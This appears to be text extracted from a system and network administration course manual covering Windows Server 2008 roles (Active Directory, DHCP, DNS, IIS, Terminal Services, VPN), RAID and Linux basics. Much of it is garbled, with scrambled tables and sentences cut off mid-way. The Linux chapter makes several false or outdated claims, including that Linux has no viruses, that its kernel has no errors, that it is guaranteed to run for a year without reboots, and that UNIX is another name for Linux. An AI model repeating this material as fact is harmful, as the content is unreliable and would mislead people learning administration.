Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
System & Network Administration As part of helping people drive business success, Microsoft is looking to help them to manage complexity and achieve agility, protect information and control access, advance the business with IT solutions, and amplify their impact. By offering a productive platform for powering application networks, Web services and virtualization with Windows Figure 1.1 Server 2008, Microsoft helps you to improve service levels at a lower cost, enables you to build and operate a flexible platform to meet changing business demands, and provides you with capabilities to secure the IT platform on which your organization relies. The better we enable your people to be productive and resourceful, the more we can help you and the individuals in your organization drive business success today and into the future. IT infrastructure is a strategic asset and the critical foundation upon which software can deliver services and user applications that a business needs in order to operate effectively and succeed. Windows Server 2008 enables greater business success by providing a platform that supports mission critical solutions and applications, making them available to your organization when it needs them. Windows Server 2008 is the platform on which you can build your business. Windows Server 2008, built with web and virtualization technologies, enables you to increase the reliability and flexibility of your server infrastructure. New virtualization tools, web resources, and security enhancements help you save time, reduce costs, and provide a platform for a dynamic and optimized datacenter. Powerful new tools like IIS7, Windows Server Manager, and Windows PowerShell, allow you to have more control over your servers and streamline web, configuration, and management tasks. Advanced security and reliability enhancements like Network Access Protection and the Read-Only Domain Controller harden the operating system and protect your server environment to ensure you have a solid foundation on which to build your business. The following figure outlines the technology investments of Windows Server 2008:
Figure 1.2
System & Network Administration Windows Server 2008 Datacenter without Hyper-V delivers an enterprise-class platform for deploying business-critical applications and large-scale virtualization on small and large servers. Improve availability with clustering and dynamic hardware partitioning capabilities. Reduce infrastructure costs by consolidating applications with unlimited virtualization licensing rights. Scale from 2 to 64 processors. Windows Server 2008 Datacenter without Hyper-V provides a foundation on which to build enterprise-class virtualization and scale-up solutions. This product does not include Hyper-V server role.
Table 1.1
Hyper-V
Network Access Protection AD Rights Management Services Terminal Services Gateway and RemoteApp
Server Manager
Table 1.2 6
Web Services (IIS) Application Server Hyper-V* Print Services Active Directory Domain Services Active Directory Services Active Directory Services DHCP Server DNS Server Fax Server UDDI Services Windows Deployment Services Active Directory Certificate Services File Services Network Policy and Access Services Terminal Services Active Directory Federation Services Table 1.3 - Full - Partial/Limited Lightweight Rights
Directory
1 2 3 4
Management
- Not Available
For customers that do not need virtualization, Windows Server 2008 Standard, Enterprise and Datacenter editions are available without Windows Server 2008 Hyper-V Technology Limited to creating Certificate Authorities no other ADCS features (NDES, Online Responder Service). See ADCS role documentation on TechNet for more information 7
Web
System & Network Administration Limited to 1 standalone DFS root -Limited to 250 RRAS connections, 50 IAS connections and 2 IAS Server Groups Limited to 250 Terminal Services Gateway connections
Web Services (IIS) Hyper-V* Active Directory Domain Services Active Directory Services DHCP Server Server Core DNS Server Print Services File Services Lightweight
Directory
For customers that do not need virtualization, Windows Server 2008 Standard, Enterprise and Datacenter editions are available without Windows Server 2008 Hyper-V Technology Limited to 1 standalone DFS root
Web
Web
System & Network Administration Desktop Experience Windows Clustering Windows Server Backup Windows Network Load Balancing (WNLB) Simple TCP/IP Services SMTP Subsystem (SUA) Telnet Client Telnet Server Microsoft Message Queuing (MSMQ) RPC Over HTTP Proxy Windows Internet Naming Service (WINS) Wireless Client Windows (WSRM) System Resource for Unix-based Applications Manager
The Windows Foundation Components for WinFX BITS Server Extensions iSNS Server Service BitLocker Drive Encryption Multipath IO Removable Storage Management TFTP SNMP Server Admin Pack RDC
System & Network Administration Peer to Peer Name Resolution Protocol Recovery Disk Windows PowerShell Table 1.5 - Available - Not Available
X86 Sockets X64 Sockets IA64 Sockets X86 RAM X64 RAM IA64 RAM Hot Add Memory Hot Replace Memory Hot Add Processors Hot Replace Processors Failover (Nodes) Fault Sync Cluster
8 8 64 GB 2 TB
32 64 64 GB 2 TB 16
4 4 4 GB 32 GB 250 50
4 4 4 GB 32 GB
Nodes 16 Memory
Tolerant
Cross-File (DFS-R)
Replication
Network Access Unlimited Unlimit Connections (RRAS) ed Network Access Unlimited Unlimit Connections (IAS) ed
Web
System & Network Administration Terminal Services Gateway Virtual Image Use Rights Remote Desktop Connections Table 1.6 - Available - Not Available Unlimited Unlimit ed Host + 4 Unlimit VM ed 2 250
Admin 2
Retail (FPP) EVALUATION EVAL Retail (FPP) NOT FOR SALE Volume Licensing (VL) VL
Special Programs
Web
11
English German Japanese French Spanish Chinese Simplified Chinese Traditional Chinese Hong-Kong Italian Russian Korean Brazilian Portuguese Dutch Swedish Portuguese Polish Turkish Czech Hungarian Table 1.8 - Available
- Not Available
Web
12
13
System & Network Administration Any computer on the network can join an existing workgroup as long the workgroup naming convention is maintained for each member throughout resources so long as the user supplies authenticated credentials for server login. Although not performed through Active Directory, Workgroup Servers contain a standard set of centralized management tools for the administration of security policies which individual, or groups of users may require in order to gain authenticated login access to resources located on the workgroup server itself. Any workgroup server with windows 2000 server installed, can be promoted to take on the role of a domain controller if a network administrator changes the network model from a workgroup to a domain based topology.
14
System & Network Administration Each domain must have at least one designated PDC server within its forest for centralized user account management through the AD. Domains share a hierarchal directory of database, security policies, and common security relationships with other sub-domains. A PDC provides access to a centralized user account and workgroup account policy as maintained by the domain administrator predominantly from the AD server itself. Because domains use a hierarchy of parent-child relationships within a domain forest, AD domains are generally recommended and most effectively used by larger organizations where collaborative computing between numerous workgroups much span multiple departmental servers with common sets of relational security policies in place.
2. Active Directory
A structure supported by Windows 2003 & 2008 that lets any object on a network be tracked and located. Active Directory is the directory service used in Windows 2003 Server& 2008 and provides the foundation for Windows Server distributed networks.
A directory service provides the methods for storing directory data and making this data available to network users and administrators. For example, Active Directory stores information about user accounts, such as names, phone numbers, and so on, and enables other authorized users on the same network to access this information.
The AD, or Active Directory, is a database based on the LDAP (Lightweight Directory Access Protocol) standard, which makes the information contained within the AD easily available to other applications across different platforms.
Structure of Active Directory
Logical Structure
Physcial strucure
Domain
Tree
Forest
Domain Controllers
Sites
Figure 2.1 15
2.1 Domain
Domain is a logical secure administrative boundary. Creating the initial domain controller in a network also creates the domain. We cant have a domain without at least one domain controller. Each domain is identified by a DNS domain name.
2.2 Trees
A tree is a group of domains that shares a contiguous namespace. In other words, a tree consists of a parent domain plus one or more sets of child domains whose name reflects that of a parent. For example, a parent domain named www.examcram.com can include child domains with names such as products. www.examcram.com, www.sales.examcram.com,and www.manufacturing.examcram.com. Furthermore, the tree structure can contain grandchild domains such as www.america.sales.examcram.com or europe.sales.examcram.com, and so on, as shown. All domains in a tree are linked with two-way, transitive trust relationships; in other words, accounts in any one domain can access resources in another domain and vice versa
System & Network Administration Whenever a password is being given for the user, the database will verify whether the new password is matching with the default password policy setting like length, complexity etc. To give a password according to the user requirement the default setting should be change.
2.5 Forest
-Multiple domains trees within a single forest do not form a contiguous namespace. -Although tree in a forest do not share a namespace, a forest will have a single root domain, called the forest root domain. -The forest root domain is the first domain created in the forest. These two forest-wide predefined groups reside in forest root domain. -Enterprise admins -Schema admins
Figure 2.2 Differences between All Versions of Windows Server Directory Services NT NTDS 2000 ADS 2003 ADS 2008 ADDS
17
System & Network Administration DATABASE Size of Database Authentication Protocol Forest Server Backup Table 2.1 SAM 40MB NTLM N/A PDC BDC NTDS.dit 16MB Kerberos Yes DC ADC NTDS.dit 12MB Kerberos Yes DC ADC NTDS.dit 12MB Kerberose Yes DC ADC
18
2.8 Sites
-Sites are just two different geographical areas.
2.9 Domains
If the policies are defined at the domain level, then the policies will be applied to every object in the domain including the administrator by default.This policies will be by default applied to OUs.
19
Figure 2.3
-Managing GPOs -Managing GPO links -Performing tasks on GPOs -Creating GPOs -Creating and editing WMI filters
Table 2.2
System & Network Administration Trusts are connectionsbetween either domains or foreststhat allow various objects within Active Directory to access, modify, and utilize resources. In general, trusts exist on two levels: forest and domain.
Figure 2.4 2.12.2.2 Shortcut trusts: - By using Kerberos, you can create a transitive trust between the two domains that allows one domain to directly access another, without having to traverse up and down their various trees. Its quite a useful trick, and it can save a lot of time.
21
Figure 2.5 2.12.2.3 Realm trusts: - Realm trusts are designed to give UNIX users the ability to authenticate and have a relationship with a Windows server. This means the users on another operating system can have access to your files and resources. However, UNIX realm trusts are one-way trusts and are not transitive.
Figure 2.6
23
3. SERVERS
When a client is turned on, it has a name but doesnt have an IP address. Also, it doesnt know the IP address of the DHCP server, so it must broadcast its request, and the DHCP server must broadcast the answer. A total of four packets are exchanged between the client and server. Many people remember the four packets by using the acronym DORA. The four packets exchanged between a DHCP client and a DHCP server is as follows: DHCP discover (the D in DORA) The DHCP discovers packet broadcasts out looking for any server running the DHCP service. DHCP offer (the O in DORA) When a DHCP server receives a DHCP discover, it responds by broadcasting an offer, which includes a lease length and specific TCP/IP options. Options would include an IP address, subnet mask, and any other TCP/IP options that have been configured on the DHCP server. Its possible for more than one DHCP server to receive the request and respond with an offer. DHCP request (the R in DORA) The DHCP client will respond to the first DHCP offer with a DHCP request. In essence, the DHCP client is requesting to confirm the lease. If a DHCP server doesnt receive a DHCP request (for example, the second DHCP server that sent an offer), the DHCP offer will time out, and the IP address will be available to give to another client. DHCP acknowledge (the A in DORA) after receiving the DHCP request, the DHCP server will respond with a DHCP acknowledge. At this point, the DHCP server confirms the IP address is allocated and not available to give to other clients, and the client begins to 24
Figure 3.1
3.2 Scopes
DHCP is configured with scopes to identify the range of available IP addresses to give to computers on that scope. A scope usually relates directly to a subnet, though subnets can contain more than one scope. Port no. for DHCP Server and DHCP clients are 67 and 68 respectively.
3.3.1 Zones
A DNS zone is group of resource records associated with a specific namespace. It includes mappings of names to IP addresses, IP addresses to names, names to services, and more. If a DNS server is responsible for maintaining records for a given namespace, it is considered authoritative for that zone.
System & Network Administration 3.3.2.2 Secondary zone: - A secondary zone is created on a different DNS server to provide load balancing for the DNS server holding the primary zone. The secondary zone is a readonly copy of the zone data. It cannot be modified except through zone transfers. 3.3.2.3 Stub zone: - A stub zone is a copy of key records in another zone. The purpose is to identify the DNS server that is authoritative for the zone. A stub zone does not contain all of the records in the zone but instead only enough records needed to communicate with the authoritative DNS server. Records contained in the stub zone are the name server (NS) record, the start of authority (SOA) record, and possibly the host (A) records. 3.3.2.4 Active Directoryintegrated zones: - Both primary zones and stub zones can also be Active Directoryintegrated zones. An ADI zone is one that is included in the Active Directory database. A significant benefit of using ADI zones is that DNS zone transfers are now part of Active Directory replication. Whenever a change occurs to objects (such as users, computers, and in this case DNS zone records) within Active Directory, the replication process recognizes the change and sends the changes to other domain controllers in the domain. Since the zone transfer is part of Active Directory replication, it is automatically encrypted. Additionally, since all DNS servers that are ADI zones are also primary zones, an ADI zone provides built-in fault tolerance. If a single DNS server fails, other DNS servers will automatically take on the load.
System & Network Administration 3.3.4.1 PTR: - The PTR record is contained within the reverse lookup zone file. It provides mapping from the IP address to a name. PTR records can be automatically created when the A or AAAA is created with dynamic update. 3.3.4.2 SOA: - The start of authority (SOA) record provides a lot of key information on the DNS server and is created when DNS is installed. 3.3.4.3 SRV: - SRV records are used to identify servers running specific services within the domain. DNS is required within an Active Directory Domain Services domain, and the existence of SRV records is a core reason why DNS is required. 3.3.4.4 NS: - The NS record is used to identify DNS name servers. A NS record can be created within a zone by viewing the properties of the zone and selecting the Name Services tab. 3.3.4.5 MX: - Mail exchanger (MX) records are used to identify mail servers. An MX record is sometimes referred to as a mail exchange record. 3.3.4.6 CNAME (alias): - A CNAME record is used to allow a single server to respond to multiple names. DNS queries with any of the names (from the A record or any of the CNAME records) will respond with the same IP address.
Figure 3.2
System & Network Administration client can be any system (Microsoft or non-Microsoft) running a web browser such as Internet Explorer. A page is requested, IIS creates HTML-formatted pages, and the client receives the HTML page and displays it in the browser.
Figure 3.3
28
Figure 3.4 - On the Confirm Installation Selections page, review your choices, and click Install. - When the installation completes, click Close.
System & Network Administration malware into the connection. This is one reason why EFF and Torproject started the development of HTTPS Everywhere, which is included in the Tor Browser Bundle. Note that when a client sends an HTTPS request, the entire request is encrypted, including the URL. However the hostname and port of the URL are visible to an eavesdropper because this information is also present in the TCP/IP packets to establish and maintain the connection. This means that an eavesdropper can see the sites you connect to, the amount of time you spend using a site, and the amount of information you upload or download on the particular site. [1] However, the entire HTTPS request, including the URL path and query parameters, can only be decrypted by the destination site or by an interposing intermediary that terminates the HTTPS connection on behalf of the site. A site must be completely hosted over HTTPS, without having some of its contents loaded over HTTP or the user will be vulnerable to some attacks and surveillance.
File Transfer Protocol (FTP) is a TCP/IP protocol that enables a user to transfer files between local and remote host computers. You place your files in directories on your FTP server so that users can establish an FTP connection and transfer files with an FTP client or FTPenabled web browser. When you load FTP, you are loading IIS 6.0 to host the FTP sites. Therefore, to manage the FTP sites, you need to open Internet Information Services 6.0 from the Administrative tools. After FTP is loaded, there will already be a Default FTP site created with C:\inetpub\ftproot as the FTP working folder. By default, you can read from the FTP site but you need to enable Write if you wish for the FTP site to be used to upload files. The available isolation modes are:-
3.6.1 Do Not Isolate Users: - This mode does not enable FTP user isolation and it works
similarly to earlier versions of IIS.
3.6.2 Isolate Users: - This mode authenticates users against local or domain accounts
before they can access the home directories that match their usernames. All user home directories are in a directory structure under a single FTP root directory where each user is placed and restricted to a home directory. Users are not permitted to navigate out of the home directory.
3.6.3 Isolate Users Using Active Directory: -This mode authenticates user credentials
against a corresponding Active Directory container, rather than searching the entire Active Directory, which requires large amounts of processing time. Specific FTP server instances can be dedicated to each customer to ensure data integrity and isolation.
30
Terminal Services is a server role in Windows Server 2008. It provides users with access to either Windows-based programs or a full Windows desktop located on a server. The full features of TS are experienced only on computers running Windows Vista or Windows Server 2008, but Terminal Services does support Windows XP and Windows Server 2003 products.
Figure 3.5
31
System & Network Administration Disconnect Session- if the session is disconnected all the programs will continue to run in the background and user can reconnect to same session. 3.7.2.1 Logoff session: - if the session is logged off then all programs will be closed and next time new session will be established. 3.7.2.2 Terminal Services Manager User terminal sessions can be monitored. Users can be forced to logoff or disconnect sessions. Let you to see all users and sessions on nay server from one location.
Figure 3.6
System & Network Administration When using Terminal Services (TS) to allow users to remotely create desktops or run TS RemoteApp applications, you often need a TS Client Access License (TS CAL) for the connection. Creating, tracking, and maintaining these licenses can be quite challenging. TS Licensing is an additional role service you can add after installing the Terminal Services role for the management of TS licenses. You must have at least one license. Two types of TS CALs can be issued. When configuring CAL licensing, you need to configure the terminal servers using the same licensing mode as the TS Licensing server. 3.7.4.1 TS per Device CAL: - The first time a computer or device connects; it is issued a temporary license by default. If the computer connects again, the license server is checked to determine whether there are any available TS CALs to issue. If so, the computer or device is issued a permanent CAL. Any user can connect to a terminal server using a computer that has been issued TS per Device CAL. Once all the available CALs are issued, computers or devices will be denied access the second time they try to connect. 3.7.4.2 TS per User CAL: - A TS per User CAL gives a user the right to access a terminal server on any number of computers or devices. Unlike TS Per Device CALs, TS Per User CALs are not enforced by the Licensing server. Administrators still have a responsibility to track the licenses and ensure adequate licenses are purchased.
Figure 3.7 A VPN differs in the connectivity to the remote access server. Instead of connecting directly to the remote access server via a telephone line, the client tunnels through the Internet. Any time the client connects via a phone line, the Point-to-Point Protocol (PPP) is used. First, the client gains access to the Internet through a local Internet service provider (ISP). If its dial-up, the client uses PPP to connect, but its also possible the client has a broadband connection to the Internet. When planning for a VPN server, youll need to decide on which tunneling protocol to use. The following tunneling protocols can be used with a Microsoft VPN server:
3.9.1 PPTP: - The Point-to-Point Tunneling Protocol (PPTP) is the oldest of the three. It is
supported by Windows 2000 and newer operating systems. It can be used with IP-based connections. 35
System & Network Administration Data is encrypted using Microsoft Point to Point Encryption (MPPE), providing data confidentiality. PPTP does not provide data integrity or machine-level authentication.
3.9.2 L2TP: - The Layer 2 Tunneling Protocol (L2TP) is supported by clients running
Windows 2000 or newer operating systems. L2TP is commonly used with IPsec, and youll often see it as L2TP/IPsec. IPsec provides data confidentiality and integrity to L2TP. Machine-level authentication can be achieved through the use of a pre shared key or computer certificates. One of the drawbacks to L2TP when used with IPsec is that it cant pass through a Network Access Translation (NAT) server. If a NAT was needed, administrators often had to move backward to a PPTP solution that sacrificed security.
3.9.3 SSTP: - The Secure Socket Tunneling Protocol (SSTP) is the newest tunneling
protocol. It is supported only on clients running Windows Vista SP1 or newer operating systems. SSTP uses Secure Sockets Layer (SSL) to encrypt the data and provide data confidentiality. Further, it uses HTTPS over TCP port 443 to pass traffic through firewalls, making it an easier solution to implement without requiring modifications to firewalls. Port 443 is often already open on firewalls. Unlike L2TP/IPsec, SSTP can pass through a NAT. SSL within SSTP also provides data integrity and machine-level authentication.
36
System & Network Administration A Windows Server 2008 dynamic disk is a physical disk configuration that does not use partitions or logical drives, and the MBR is not used. Instead, the basic partition table is modified and any partition table entries from the MBR are added as part of the Logical Disk Manager (LDR) database that stores dynamic disk information at the end of each dynamic disk. Dynamic disks can be divided into as many as 2,000 separate volumes, but you should limit the number of volumes to 32 for each dynamic disk to avoid slow boot time performance. Dynamic disks do not have the same limitations as basic disks. For example, you can extend a dynamic disk on the fly without requiring a reboot. Dynamic disks are associated with disk groups, which are disks that are managed as a collection. This managed collection of disks helps organize dynamic disks. All dynamic disks in a computer are members of the same disk group. Each disk in a disk group stores replicas of the same configuration data. This configuration data is stored in the 1MB LDR region at the end of each dynamic disk. Dynamic disks support five types of volumes: simple, spanned, mirrored, striped, and RAID5. You can extend a volume on a dynamic disk. Dynamic disks can contain a virtually unlimited number of volumes, so you are not restricted to four volumes per disk as you are with basic disks. 3.10.3 The five types of dynamic volumes are 3.10.3.1 Simple Volumes A simple volume consists of disk space on a single physical disk. It can consist of a single area on a disk or multiple areas on the same disk that are linked together. 3.10.3.2 Spanned Volumes A spanned volume consists of disk space from more than one physical disk. You can add more space to a spanned volume by extending it at any time. 3.10.3.3 Striped Volumes A striped volume stores data in stripes on two or more physical disks. Data in a striped volume is allocated alternately and evenly (in stripes) to the disks contained within the striped volume. Striped volumes can substantially improve the speed of access to the data on disk. Striped volumes are often referred to as RAID-0; this configuration tends to enhance performance, but it is not fault tolerant. 3.10.3.4 Mirrored Volumes and RAID-5 Volumes You can create mirrored volumes and RAID-5 volumes only on dynamic disks running on Windows Server 2008, Windows Server 2003, or Windows 2000 Server computers. Both mirrored volumes and RAID-5 volumes are considered fault tolerant because these configurations can handle a single disk failure and still function normally. Mirrored volumes and RAID-5 volumes both require that an equal amount of disk space be available on each disk that will be a part of these volumes. A mirrored volume must use two physical disksno 37
System & Network Administration more and no fewer than two physical hard disk drives. A RAID-5 volume must use at least three physical hard disks up to a maximum of 32 physical disks. Many network administrators and consultants agree that hardware-based fault tolerant solutions are more robust and reliable than software-based fault tolerant configurations. By installing one or more RAID controller adapter cards into a server, you can set up several different types of hardware fault tolerance, such as mirroring, RAID-5, RAID 10 (mirrored volumes that are part of a striped array set), and RAID 0+1 (striped volumes that are part of a mirrored set). When you use hardware RAID, you can retain basic disks or you can convert disks to dynamic; hardware RAID is hidden to Windows Server 2008. Of course, its less expensive to implement a software solution, such as setting up mirrored volumes or RAID-5 volumes using the Disk Management console in Windows Server 2008, but often the improved performance, reliability, and flexibility of hardware-based RAID far outweighs its extra cost.
3.11 RAID
When configuring fault tolerance for a server, you will often consider fault tolerance on your disks first. Fault tolerance on disks comes in the form of Redundant Array of Independent Disks or (Redundant Array of Inexpensive Disks), or RAID.
RAID Level
Strengths
Weaknesses
RAID 0
Highest performance
No data protection; One drive fails, all data is lost High redundancy cost overhead; Because all data is duplicated, twice the storage capacity is required
RAID 1
Disk mirroring
Very high performance; Very high data protection; Very minimal penalty on write performance
38
System & Network Administration RAID 2 Not Used In LAN No practical use Previously used for RAM error environments correction (known as Hamming Code ) and in disk drives before the use of embedded error correction Excellent performance for large, sequential data requests No practical use; Same performance can be achieved by RAID 3 at lower cost
RAID 3
Not well-suited for transactionoriented network applications; Single parity drive does not support multiple, simultaneous read and write requests Write requests suffer from same single paritydrive bottleneck as RAID 3; RAID 5 offers equal data protection and better performance at same cost High redundancy cost overhead; Because all data is duplicated, twice the storage capacity is required; Requires 39
RAID 4
RAID 5
Highest performance, highest data protection (can tolerate multiple drive failures)
4. INTRODUCTION TO LINUX
LINUX is an open source / free software. With its advanced server configuration, Red Hat is putting Linux as an operating system at the core of enterprise computing. Today Linux is found in Web infrastructure, file server, ERP, and point of sale system, increasingly in the systems running critical applications at large companies. Analysts predict that by the end of this decade Linux will be a common element in the enterprise computing landscape. Over the last year, weve seen Linux go from being focused on small and medium business to being used very deep in the enterprise, says Paul Cormier, executive vice president of engineering at Red Hat, a leading Linux platform provider.
System & Network Administration Computer servers, etc..). Linux is also the most powerful yet most simple and easy to use operating system in the world. Linux is the most reliable OS. Windows 9X/NT fails the CRASH_OS_TEST Programs and only Linux passes. Also commercial UNIXs like IRIX, Solaris, HPUX, AIX, SCO all fail the crash test and Linux is the only OS which passes the crash me test. Very often Windows 95 users will get GPF errors and the system freezes. Linux is very robust because it is built by millions of people on internet and there are no errors in the kernel. It runs for one full year without any re-boots or any problems non-stop, guaranteed. It is the best designed OS. Linux has an excellent scalability - it runs on Uni-processor, Multi-processors, Parallel Processors and even Super-computers. It fully supports SMP (Symmetric Multi-Processing) boxes with more than one CPU. Windows 95 supports only one CPU box. Linux scales much better than NT on SMP. Linux is fully 32-bit & 64-bit operating system. And it is very modular and is already ported to 64-bit chips like DEC alpha, Sun Microsystems Ultra Sparc, Intel IA64, Motorola PowerPC, Transmeta Corp Crusoe chip and GNU/GPL Freedom 64-bit CPU. Whereas Windows 95 has a major chunks of 16-bit code in its kernel and MS Windows runs only on one type of chip -" Intel chip". Linux is a very secure OS. Windows 95 is not a secure OS, break-ins are easy. Windows 95/2000, NT, MSDOS have computer viruses. But Linux does not have any viruses. Computer viruses cause lot of damages to Windows 95/2000/NT but not to Linux. Linux is very mature and is one of the oldest operating system in the world. UNIX (which is another name for Linux) was born in AT&T Bell Labs 27 years ago for Telecom research. Linux (UNIX) is the end-result of 27 years of research and development effort by U.S/European Universities and mega-corporations of Europe / America. It took 27 years to create vast amount of UNIX information, and all that info is now just sitting inside this Linux cdrom on our hand. For example programs like 'grep' had not changed for the past 27 years and they are still used in Linux. Functionality and command line options of grep had not changed for the past 27 years. Linux started the Linux during 1991, but he borrowed lot of concepts, code from UNIX and this means Linux is 27 years old. Today Linux is the OCEAN wherein all other unixes like Solaris, HPUX, and AIX merge into. And in near future all other unixes will be replaced by Linux. Linux is less demanding on system resources. Linux runs on 386 PC with as little as 2 MB RAM in command-line console mode. Windows 95/NT cannot because the graphic engine is included in the kernel, which makes Windows 95/NT a resource hog. Graphic engine makes the Windows 95/NT extremely unreliable and unpredictable. Linux can do everything that Windows 95/NT does but Windows 95/NT cannot do everything which Linux does. In Windows 95/NT there is no option for the user to run in command-line console mode without 41
System & Network Administration any graphics. Unlike Windows95, X-window can run with very minimum resources, it runs on 486 boxes with just 8MB of RAM. Linux uses X-window which is an advanced network-windowing system, whereas Windows 95/NT is a standalone single-workstation windowing system. For example, using Xwindow, users can display output on any workstation-monitor attached anywhere in the network. There is a command called "xhost" in Linux and display environment variable, export display=`hostname`:0.0. Like this there are lots of functionalities in X-window which are missing in Windows NT/95. X-Window is an industry standard which was developed in MIT and is a very powerful network windowing system. With X-window you can run programs on super-computers and display on your Linux desktop locally. Even though Xwindow is network-resource intensive, it is becoming increasingly popular because of the availability of very low cost, high speed networking like 1 Gig bit Ethernet cards, 100 Megabit Ethernet cards, DSL lines, Cable-Modems, Frame-relay and ATM networks. Linux has very low total cost of ownership since Linux supports diskless nodes. Cost of maintaining Linux is five times lower than MS Windows.
Linux supports remote system administration whereas Windows NT/95 does not. We can remote login and do many system administration tasks, for example like adding users, reboot a Linux server from a remote terminal hundreds of miles. Linux runs most windows applications (16bit) like MSOffice, MSWord using WABI ($40), WINE (free) and MSDOS applications using DOS emu, Free DOS, and Dr. DOS. But Windows95/NT will run only few of UNIX and Linux applications. Linux supports su (super user) command. Using su command it is possible to switch user without logging off. For example 'su - root' will login as user 'root'. In Windows NT/95 you must log off completely to switch user. Linux has remote commands like 'rlogin', telnet, etc. While Windows NT/95 does not have. Linux kernel is very small and it can fit on a single floppy. It is less complex but very sophisticated and powerful. Small kernel means it is very reliable. Linux applications are much bigger running on top of the Linux Kernel. Linux has many powerful desktops like KDE desktop, GNOME, Triteal CDE, Motif mwm, Open look olwm, twm, fvwm95, xdm, xsm, Windows Afterstep, Window maker (NeXTsteplookalike), Qvwm, amiwm (amiga), mlvwm (mac) etc. KDE desktop is much more user friendly than Windows95! You have more freedom and choice in Linux desktops as compared to Windows 9X/NT. Linux OS needs only 200 MB of disk space for installation. Linux supports dual boot on the PCs - that is, you can have Windows95/NT on one partition and Linux on other. During 42
System & Network Administration system startup user can select to load Linux or Windows 95 and vice versa. Nowadays PCs are shipped with 6 Gigs of disk space. Linux runs on many hardware platforms - Intel, Motorola, PowerPC, RISC, DEC Alpha, MIPS, ARM, Transmeta Crusoe, Sparc architectures and GNU Freedom-64-bit CPU. Linux is already ported to 1024 CPUs super computer (Fujistu, Hitachi, Sun, Intel & others). Intel corporation had built the world's fastest super-computer with 10240 Intel Pentium CPUs (more than ten thousand CPUs) which is based on a system similar to Linux. Linux is 100% POSIX compliant OS, whereas Windows NT/9X are not. POSIX is IEEE (Institute of Electrical Eng.) standard as well as ANSI and international ISO standard spec. U.S. GOVT. generally require full compliance of POSIX on any operating system. Most of the UNIXs like Solaris, HPUX, AIX, and SCO are 100% POSIX We can get the complete source code for Linux OS and all of its applications, whereas Windows 9X/NT is proprietary and we get only the binaries. Having the source code of Linux is vital for companies because they can quickly add advanced features and share it with every other company in the world. Linux is free of any cost. Downsides of Windows 9X/ NT is that we need to pay $200 (US dollars) per seat for Windows 95 and $800 (US dollars) per seat for Windows NT. And Microsoft applications like MS Office, C++ compilers and others will cost further $400,000 US dollars. It is better to spend money on hardware and use Linux as the software. Linux is trouble free and we will not have any problems with Linux, whereas you will have more headaches with Windows 95/NT (MS is not as reliable as Linux). Linux more than 1900 software packages on cdrom and many more are being developed world-wide. All the software packages are in a single Linux cdrom. Linux was awarded The best Network Operating system 1997/98/99/2000, by many computer magazines (US InfoWorld, European publications). The movie Titanic was created using Linux on Digital Alpha. Linux was used to create computer graphics, animations of all the shots in the movie Titanic. Linux was also used for storing data from experiments in the space shuttle. Linux was orbiting the earth in space.
4.2 Advantages of Linux:Virus proof Economical Advanced OS Secured Crash proof Fully supported 43
Powerful networking Variety of servers Table 4.1 Who are using Linux:Private sector Raymonds ICICI IDBI Bombay Dyeing Asian Paints Bharat petroleum Reliance Government sector Air-India Central Excise Govt. of MP Govt. of Goa Govt. of Kerala Govt. of A P etc. Railways Table 4.2
5.1 KERNEL
The core of the Linux system is the kernel-the operating system program. The kernel controls the resources of the computer, allotting them to different users and tasks. It interacts directly with the hardware, thus making the programs easy to write and portable across different platform of hardware. Since the kernel communicates directly with the hardware, the parts of the kernel must be customized to the hardware features of each system. However, 45
System & Network Administration the kernel does not deal directly with a user. Instead, the login process starts up a separate, interactive program, called the shell, for each user.
5.2 SHELL
Linux has a simple user interface called the shell that has the power to provide the services that a user wants. It protects the user from having to know the intricate hardware details.
5.4.2 ISO 9660 CDROM: - The standard file system for CD-ROM. It is also known as the
High Sierra File System or HSFS on other UNIX systems.
5.4.3 Minix:-The standard file system for the Minix operating system. This is the original
default Linux file system. The current Linux standard is ext3.
5.4.4 NTFS: - NTFS is the Microsoft Windows NT/2000/XP file system designed for
username / password security. Currently supported as a read-only system.
5.4.5 OS/2 HPFS: - The standard for IBMs OS/2 operating system. 5.4.6 /proc: - The /proc file system is a Linux virtual file system. Virtual means that it
doesnt occupy real disk space. Instead, files are created as needed. /proc is used to provide information on kernel configuration and device status.
5.4.7 /dev/pts: - The /dev/pts file system is the Linux implementation of the Open Groups
Unix98 PTY support.
5.4.8 ROM:-The ROM file system is a read-only file system, intended primarily for initial
RAM disks such as an installation boot floppy.
5.4.9 Second Extended (ext2):-The basis for ext3, the standard Linux file system. The ext3
file system is essentially ext2 with journaling.
5.4.10 Third Extended (ext3):- The standard Linux file system. 5.4.11 NFS:-The Network File System. This is the system most commonly Used to share
files and printers between Linux and UNIX computers.
5.4.12 SMB: - Server Message Block (SMB) is based on Microsoft and IBM Network
protocols. Linux can use SMB to share files and printers With Microsoft Windows operating systems.
5.4.13 NCP: - Net ware Core Protocol (NCP) is the network file system used by Novell,
using the IPX/SPX protocol stack. NCP allows Linux to use NCP as A client Types.
System & Network Administration The FHS is a standard for organizing directories for Linux- and Unix-based systems. Every FHS-compliant operating system starts with a top directory, root, symbolized by the forward slash. All other directories are subdirectories of root.
Direc Description tory / The root directory. Other directories are below root in the FHS hierarchy. Unless mounted separately, the contents of other directories are in the root directory partition.
/bin Essential command line commands. Do not mount this directory on a separate volume, or else you may not be able to find these commands when you use a rescue disk. /boot Linux startup programs. Normally includes the Linux kernel. Separate/boot partitions are common; the default size is currently 100MB. /dev Linux device drivers. Do not mount this directory on a separate partition. /etc Basic configuration files. /hom User home directories (accept the root user). e /lib Program libraries. Do not mount this directory on a separate partition.
/mnt Mount point for removable media (floppy disks, CD drives). /opt For applications, such as Star Office or VMWare. /proc Running kernel processes. /root Home directory for the root user. Do not mount this directory separately. /sbin System administration commands. Do not mount this directory separately. /tmp Temporary file default directory. /usr Small programs. /var Log files, print spools, and other variable-sized data. /etc All configurations files. Table 5.1
5.4.2 $PATH
48
5.4.3 $PATH
